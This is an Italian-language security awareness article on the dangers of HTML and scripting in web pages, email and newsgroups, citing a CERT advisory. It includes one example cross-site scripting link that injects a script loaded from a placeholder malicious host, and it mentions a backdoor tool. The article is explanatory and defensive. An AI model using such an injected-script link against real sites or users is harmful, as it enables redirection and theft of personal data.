Sicurezza/I pericoli del nuovo HTML

L'evoluzione dell'HTML ha portato all'implementazione nel linguaggio di moltissime funzionalità in più, ma anche un più alto grado di rischio per la privacy e la sicurezza degli utenti. Vediamo il perché

Javascript, Java e ActiveX sono ormai gli strumenti indispensabili per l'integrazione nelle pagine Web di quell'interattività tipica di Internet dei nostri giorni, strumenti di programmazione che ampliano moltissimo le potenzialità dell'HTML, la "lingua franca" di Internet. Ma è proprio la potenza di questo connubio fra HTML e linguaggi di script che comincia ad impensierire gli esperti di sicurezza di tutto il mondo: basti leggere le numerose notizie di questi ultimi mesi riguardanti hacker che hanno sfruttato particolari ?buchi? nelle applicazioni per Internet, in primo luogo browser e client di posta elettronica.

Proprio di questi giorni il monito ufficiale del CERT che, sul proprio sito Web, ha pubblicato alcune considerazioni riguardo l'uso (o l'abuso) di tag HTML potenzialmente ?maliziosi?, applicabili anche a posta elettronica e newsgroup.

Che un sito Web possa essere incluso nelle considerazioni di eventuali abusi del codice HTML si capisce, ma cosa possono avere a che fare una e-mail spedita ad un amico od un post mandato sul proprio newsgroup preferito? Semplice: il linguaggio HTML è ormai uscito dal Web approdando anche ad altre risorse di Internet: e-mail, newsgroup, mailing-list, chat...
L'uscita del documento ufficiale sopra citato dichiara che i sistemi potenzialmente colpiti da tale ?infezione? sono i browser ed i server Web che generano dinamicamente pagine basate sull'introduzione di dati non validi o non sicuri (pensiamo ad esempio ai tanti moduli di iscrizione sparsi per la Rete).

Esemplificando, possiamo dire che il rischio si può produrre quando, ad esempio, ci iscriviamo ad una banalissima mailing-list, ad una newsletter o ad un modulo in linea (che si tratti di un sito di commercio elettronico o di una semplice indagine di mercato) credendo di indirizzare i dati verso il server dove siamo approdati qualche minuto prima, mentre, in realtà, tutti i dati interessanti vengono reindirizzati altrove. Tutto questo tramite degli script inglobati nel codice HTML.
Facciamo un esempio:

"<A HREF=?http://esempio.com/commento.cgi?miocommento=<SCRIPT SRC='http://sito-malizioso/file-malizioso'></SCRIPT>?> Clicca qui!</A>"

In questo caso un comunissimo link di pubblicità al nuovo prodotto di casa PincoPallo contenuto nella mail appena pervenutaci potrebbe tramutarsi in una pericolosa violazione alla nostra privacy.

Certo, questo pericolo potrebbe essere escluso a priori se (come da Netiquette - http://www.inferentia.it/netiquette) adottassimo il sistema del solo testo per l'invio della nostra corrispondenza (ad esempio inoltrando una e-mail ricevuta), sia essa posta elettronica od un post su di un gruppo di discussione, però dobbiamo tener conto che i nuovi client e-mail supportano sempre più massicciamente e completamente il formato HTML, fra cui Outlook, Messenger e Eudora (inossidabile software per puristi della posta elettronica, è ormai arrivato ad implementare l'uso della formattazione avanzata nelle ultime versioni del programma).

Inoltre, se è vero che tale pericolo potrebbe essere evitato inviando messaggi in puro testo (le opzioni di conversione automatica HTML-Plain Text per la posta in arrivo non funzionano nel 100% dei casi), è altrettanto vero che l'utenza di Internet non è educata a comprendere la differenza tra un link ?sano? ed uno ?malizioso?, poiché, giustamente, non è doveroso né tantomeno necessario diventare programmatori per poter navigare sul Web, un luogo che per sua stessa natura dovrebbe poter essere consultato nel modo più semplice e sicuro possibile, senza pensare troppo se la connessione avviene via SSL, SET o su protocollo non protetto.

L'esempio sopra citato potrebbe essere adattato comunque ad una qualsiasi esigenza del programmatore ?malizioso? inserendo nel link uno script a proprio piacere, oppure un link ad uno script esterno, o ancora ad un controllo ActiveX/Java.

Attualmente i tag inclusi nell'ultima versione dell'HTML, ovvero la 4.1, sono davvero molti e di varia natura e potenza, troviamo infatti "<SCRIPT>", "<OBJECT>", "<APPLET>" e "<EMBED>", praticamente possiamo inserire in una mail tutto il potenziale tecnologico esistente nel panorama Web attuale (dal gioco in Java al setup automatico eseguito con ActiveX).

Pensando poi agli attuali strumenti per hacking esistenti sul mercato (come SilkRope) viene facile pensare che diventi sempre più semplice la possibilità di eseguire l'installazione di una backdoor ascoltando il file musicale di Natale che ci ha appena spedito un nostro caro amico, che a sua volta l'ha ricevuto da qualcun altro e così via.

TAG: sicurezza